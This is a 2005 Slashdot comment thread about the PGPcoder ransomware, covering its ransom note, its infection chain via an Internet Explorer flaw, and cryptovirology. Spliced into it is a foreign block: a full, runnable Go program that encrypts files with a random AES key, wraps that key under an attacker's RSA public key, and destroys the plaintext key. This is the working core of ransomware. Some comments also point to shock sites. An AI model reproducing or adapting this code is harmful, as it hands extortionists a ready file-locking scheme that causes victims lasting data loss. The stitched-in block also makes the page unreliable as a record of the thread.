Security
Virus Holds Computer Files 'Hostage' for $200

dwayner79 sent in a story about a new virus making the rounds. This one is unique because it locks your files and then demands a $200 ransom to get them back. It seems to me that this might leave some sort of traceable money trail. They don't have much information on any particular transmission mechanism; they just talk about web pages giving it up.
  • Must be a real moron (Score:5, Informative)

    by Kosi ( 589267 ) on Tuesday May 24, 2005 @09:45AM (#12622760)
    because his "blackmail-letter" is a file called attention!!!.txt, containing this:

    Some files are coded.
    To buy decoder mail: n781567@yahoo.com
    with subject: PGPcoder 000000000032

  • Not Possible (Score:1, Informative)

    by Billy the Impaler ( 886238 ) on Tuesday May 24, 2005 @09:45AM (#12622763)
    There's no way for a programmer to collect a ransom for files. How's he going to collect the money, a paypal account? Please! The feds will be all over this guy in a matter of minutes.
  • Re:a fix (Score:3, Informative)

    by keshto ( 553762 ) on Tuesday May 24, 2005 @09:47AM (#12622802)
    Because if the hacker has encrypted the files with a random passphrase and assuming this passphrase isn't the same for all the computers he attacks, it is highly unlikely a security company will be able to easily decrypt the files.

    That is what is particularly scary about this. What if the hacker went offline-- even if you are willing to pay the money, you can't get to the files. They are as good as deleted
  • Re:I call hoax (Score:2, Informative)

    by hedleyroos ( 817147 ) on Tuesday May 24, 2005 @09:59AM (#12622920)
    You are an idiot for dismissing South Africa as third world. We may be in Africa and suffer from some of its problems, but I am sitting here typing my message from a Gentoo box while installing FreeBSD on another machine. Third world? I think not. Also, the sun rises earlier in South Africa than in the US. We sometimes get news earlier than you do because New Zealand and Australia wake up looong before you do.
  • by scovetta ( 632629 ) on Tuesday May 24, 2005 @10:04AM (#12622961) Homepage
    I just finished reading "Malicious Cryptography: Exposing Cryptovirology", and it talks greatly about exactly this. The problem is that, due to wonderful things like public-key encryption, evildoers could conduct an attack like this without leaving a trace.

    I'd highly recommend the book (no, I don't know that author).
  • by HadenT ( 816717 ) on Tuesday May 24, 2005 @10:11AM (#12623017)
    Why not:
    generate random key, encrypt data with it (symmetric),
    encrypt that key with public one (stored in virus itself), destroy random key, give victim encrypted key.
    Victim sends encrypted key to author, he decrypts it using his private key and sends it back.
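The scheme HadenT sketches above, written out as an added example for this page (it is not code from the thread, from the reported virus, or from any real tool). The comment names neither cipher, so the concrete choices here are assumptions: AES-256-GCM for the per-victim symmetric encryption and RSA-OAEP for wrapping the session key. The file names and contents are constructed sample data, and the attacker's key pair is generated in-process for the demonstration; in the scheme as described only the public half would travel with the virus.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Locked is everything the scheme leaves on the victim's disk: each file's
// ciphertext plus the per-victim session key wrapped under the attacker's
// public key. The plaintext session key is deliberately absent.
type Locked struct {
	WrappedKey []byte            // RSA-OAEP(sessionKey) under the public key
	Files      map[string][]byte // filename -> nonce || AES-GCM ciphertext
}

// newAttackerKey stands in for the key pair the author generates once,
// offline (assumption: 2048-bit RSA). Only the public half is needed to lock.
func newAttackerKey() (*rsa.PrivateKey, error) {
	return rsa.GenerateKey(rand.Reader, 2048)
}

// sampleFiles is constructed sample data, not real victim files.
func sampleFiles() map[string][]byte {
	return map[string][]byte{
		"budget.xls": []byte("Q2 forecast: 1,200,000"),
		"thesis.doc": []byte("Chapter 1. Introduction"),
	}
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// lock is the victim-side half: draw a fresh random session key, encrypt
// every file with it, wrap the key under the public key, destroy the copy.
func lock(pub *rsa.PublicKey, files map[string][]byte) (*Locked, error) {
	sessionKey := make([]byte, 32) // AES-256
	if _, err := rand.Read(sessionKey); err != nil {
		return nil, err
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	out := &Locked{Files: make(map[string][]byte, len(files))}
	for name, plaintext := range files {
		nonce := make([]byte, gcm.NonceSize())
		if _, err := rand.Read(nonce); err != nil {
			return nil, err
		}
		// dst=nonce gives nonce || ciphertext || tag; the filename is bound
		// as associated data so blobs cannot be swapped between files.
		out.Files[name] = gcm.Seal(nonce, nonce, plaintext, []byte(name))
	}
	out.WrappedKey, err = rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, sessionKey, nil)
	if err != nil {
		return nil, err
	}
	// Zero the only plaintext copy: from here on nothing on the victim's
	// machine can decrypt the files without the attacker's private key.
	for i := range sessionKey {
		sessionKey[i] = 0
	}
	return out, nil
}

// unwrap is the author-side step: the victim mails WrappedKey, the author
// recovers the session key with the private key and mails it back.
func unwrap(priv *rsa.PrivateKey, wrapped []byte) ([]byte, error) {
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, wrapped, nil)
}

// unlock decrypts the files with a recovered session key. A wrong key fails
// GCM authentication instead of producing garbage.
func unlock(sessionKey []byte, locked *Locked) (map[string][]byte, error) {
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	out := make(map[string][]byte, len(locked.Files))
	for name, blob := range locked.Files {
		ns := gcm.NonceSize()
		if len(blob) < ns {
			return nil, fmt.Errorf("%s: ciphertext too short", name)
		}
		pt, err := gcm.Open(nil, blob[:ns], blob[ns:], []byte(name))
		if err != nil {
			return nil, fmt.Errorf("%s: %w", name, err)
		}
		out[name] = pt
	}
	return out, nil
}

func main() {
	priv, err := newAttackerKey()
	if err != nil {
		panic(err)
	}
	locked, err := lock(&priv.PublicKey, sampleFiles())
	if err != nil {
		panic(err)
	}
	fmt.Printf("all the victim can send: %d-byte wrapped key %x...\n", len(locked.WrappedKey), locked.WrappedKey[:8])
	key, err := unwrap(priv, locked.WrappedKey)
	if err != nil {
		panic(err)
	}
	files, err := unlock(key, locked)
	if err != nil {
		panic(err)
	}
	for name, pt := range files {
		fmt.Printf("%s: %q\n", name, pt)
	}
}
```

Run it with `go run`. The point to take from it is the one keshto makes above: after `lock` returns, the only key material left on the machine is `WrappedKey`, and it is different for every victim, so a vendor cannot ship one universal decryptor and a reverser cannot pull a key out of the binary. It also shows the failure mode keshto worries about: if the private key holder disappears, `unwrap` can never run and the files stay locked. Note that this is the design the thread fears, not what the 2005 sample actually shipped; Joe Stewart says below that the real encryption was trivial.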
  • Re:Finally! (Score:2, Informative)

    by sosume ( 680416 ) on Tuesday May 24, 2005 @10:12AM (#12623035) Journal
    I too was innocent on the subject of lemon party.

    I expected some funky game involving lemon juice and pie ..

    Now I know as well.

    This is even more gross than goatse, parrot or tubgirl! As a matter in fact I'm taking the rest of the day off, avoiding elderly people, to make sure my mind can recover.

    Fellow /.ers, please take my advice and do NOT google for it.

    I won't be able to get the image I just googled out of my memory next time someone mentions a lemon .. even though I don't really understand the 'lemon' part
  • Re:I call hoax (Score:5, Informative)

    by t123 ( 642988 ) on Tuesday May 24, 2005 @10:13AM (#12623041)
    try the websense website with more detailed information [websensesecuritylabs.com].
    The original infection occurs when the user visits a malicious website that exploits a previous vulnerability in Microsoft Internet Explorer. This vulnerability allows applications to run without user intervention. The malicious website uses the Windows help subsystem and a CHM file to download and run a Trojan Horse (download-aag). The downloader then connects, via HTTP, to another malicious website. This website hosts the application that encodes files on the user's local hard disk and on any mapped drives on the machine. The malicious code also drops a message onto the system with instructions on how to buy the tool needed to decode the files. This message includes the email address of a third party to contact for instructions, and the user is directed to deposit money into an online E-Gold account.
  • Re:Finally! (Score:1, Informative)

    by Pastis ( 145655 ) on Tuesday May 24, 2005 @10:14AM (#12623055)
    You can learn about lemonparty here, but browse without images...

    http://www.encyclopediadramatica.com/index.php/Lemonparty [encycloped...matica.com]
  • by R.Mo_Robert ( 737913 ) on Tuesday May 24, 2005 @10:17AM (#12623087)

    Do you really think a virus is going to take spyware hostage and then demand $200 for the key to unencrypt it? I don't know about you, but even if it did, I sure wouldn't be happy with this kind of virus on my computer.

    Plus the article mentions this particular infection affected only "at least fifteen types of data," most of which were presumably important to the user, like spreadsheets and the like. But again, even if it did encrypt malware ... I don't see how it could be a good thing. Let's introduce them to Ad-Aware, Spybot, etc. instead, and safe browsing habits--the lack of which probably allowed both this virus and the malware on the computer in the first place.

  • by Mattias ( 24907 ) on Tuesday May 24, 2005 @10:30AM (#12623205)
    The encrypt-files-and-demand-ransom-trick has been tried before by criminals in 1989. A company sent out disks with software containing a trojan that encrypted the harddisk and then demanded money to decrypt it.

    http://www.claws-and-paws.com/virus/papers/history-of-computer-viruses.html#C05 [claws-and-paws.com]
  • by caluml ( 551744 ) <slashdot@spamgoe ... minus herbivore> on Tuesday May 24, 2005 @10:30AM (#12623216) Homepage
    Actually, the best **almost** anonymous way of sending messages is to PGP/GPG encrypt them, and post them to alt.anonymous.messages [google.com]. Then, the right person, with the correct key can download your message, and (if he downloads every message in the group every day), you'd never know which ones he was able to read. And obviously others wouldn't be able to read the contents.
  • Re:Finally! (Score:5, Informative)

    by Dusabre ( 176445 ) on Tuesday May 24, 2005 @10:35AM (#12623265) Homepage
    WATCH OUT!

    There is a thumbnail!
  • Re:a fix (Score:4, Informative)

    by budgenator ( 254554 ) on Tuesday May 24, 2005 @10:56AM (#12623453) Journal
    according to TFA
    Stewart managed to unlock the infected computer files without paying the extortion, but he worries that improved versions might be more difficult to overcome.

    so it's already been either bruteforced or cracked. My hunch is that an encryption program carried in a virus would be rather simplistic.
  • Re:a fix (Score:3, Informative)

    by httptech ( 5553 ) on Tuesday May 24, 2005 @10:59AM (#12623479) Homepage
    It's not a command in the trojan that decrypts the files, it's a program the trojan author sends you after you send him $200. However, the encryption is trivial and just about any reverse-engineer could write a decryptor for you.

    -Joe

    Joe Stewart, GCIH
    Senior Security Researcher
    LURHQ http://www.lurhq.com/ [lurhq.com]
  • Re:Wow (Score:5, Informative)

    by httptech ( 5553 ) on Tuesday May 24, 2005 @11:02AM (#12623509) Homepage
    Yes, funny funny. In context, though, you have to know the question the reporter asked me, which was, "Do you think this software was a test, or do you think it was malicious?"

    -Joe

    --
    Joe Stewart, GCIH
    Senior Security Researcher
    LURHQ http://www.lurhq.com/ [lurhq.com]
  • Re:Crypto Question (Score:5, Informative)

    by swillden ( 191260 ) * <shawn-ds@willden.org> on Tuesday May 24, 2005 @11:20AM (#12623699) Journal

    If you have just two files it's still extremely hard... you need something like 2^23 files to do it in a reasonable amount of time (assuming RSA+IDEA).

    This post is incorrect. Probably a semi-subtle troll rather than an honest error.

    Neither RSA nor IDEA is vulnerable to a known-plaintext attack. In fact, any cipher that is vulnerable to such an attack is considered completely insecure, especially if only 2^23 "files" are needed.

    If you get to choose the contents of one of the files it's only about 2^17.

    Neither RSA nor IDEA is vulnerable to a chosen-plaintext attack. There were some chosen-plaintext attacks against RSA a few years back (mid 90s), but proper padding eliminates them. And far more than 2^17 trials were required for typical key sizes. Again, no cipher that was vulnerable to such an attack would be considered secure.

    Obviously, if the keys are larger, it will take exponentially longer.

    Larger than what? Are you assuming extremely small key sizes in order to achieve the numbers above? Actually, you don't get to pick the size of an IDEA key, because IDEA keys are 128 bits. Though you can arbitrarily fix key bits to produce a smaller effective key, there's no reason why the virus writer would want to do that.

  • by RIAA Bounty Hunter ( 885360 ) on Tuesday May 24, 2005 @01:13PM (#12624942) Homepage
    That virus was known as Casino.2330 [nai.com].

    Screenshots [virusexperts.com]

  • by Leebert ( 1694 ) on Tuesday May 24, 2005 @05:12PM (#12627583)
    You're probably referring to the "One-Half" virus, if I recall correctly from my days reading alt.comp.virus.

    This was the classic example as to why blindly running "fdisk /mbr" from a boot floppy was a no-no.
  • by icypyr0 ( 636724 ) <icypyro@nOSPAm.wi.rr.com> on Tuesday May 24, 2005 @10:53PM (#12630392)
    Too bad an FBI investigation/prosecution costs over $200,000 on average. That's 1000x the $200 ransom. Bottom line; it would have to be a widespread thing for the FBI to give a shit.
  • by AstroDrabb ( 534369 ) * on Wednesday May 25, 2005 @12:14AM (#12630889)
    You can protect individual user directories in Windows XP if you set up permissions correctly, just the same as how you can protect individual user directories on Linux if you set up permissions correctly.
    Yes, you can set up XP permissions correctly. Well, XP Home kills your ability to do this easily. Read this article [winsupersite.com]. XP Home is pretty much brain dead IMO. From the article about Home vs Pro:
    The most obvious difference is security, which is vastly simplified in Home Edition. Each interactive user in XP Home is assumed to be a member of the Owners local group, which is the Windows XP equivalent of the Windows 2000 Administrator account
    So the majority of all computer users using MS Windows XP are running as admin. They are open to far more problems than the typical Linux or Mac OS X user who is running as a non-admin user. Sure you can run as root/admin under the other OSes, however it is not the norm.
    I would argue that there are quite a few new Linux users who foolishly make liberal use of the root account to make certain tasks easier. While maybe a competent Linux user would not make such mistakes, there's no reason to expect that a competent user would make the same kinds of mistakes on a Windows machine.
    And your argument would be wrong. All of the major Linux distros have users create a non-root account at _install time_. When it comes time to do a task that requires root, a nice little GUI window pops up and asks for the root password (oh, this also happens from the console/command line).
    it's not helpful when Linux extremists like you warp the truth to fit your agenda.
    Linux extremists like me? So I say something negative about MS and now I am a "Linux extremist"? Stop being an MS apologist. I make my living by writing software on MS OSes. I just don't apologize for all the stupid things MS does.
    You should be ashamed.
    Ashamed of what? Not making up excuses for every brain dead thing that MS has done. You should be the one that is ashamed for sweeping the problems of MS under the rug.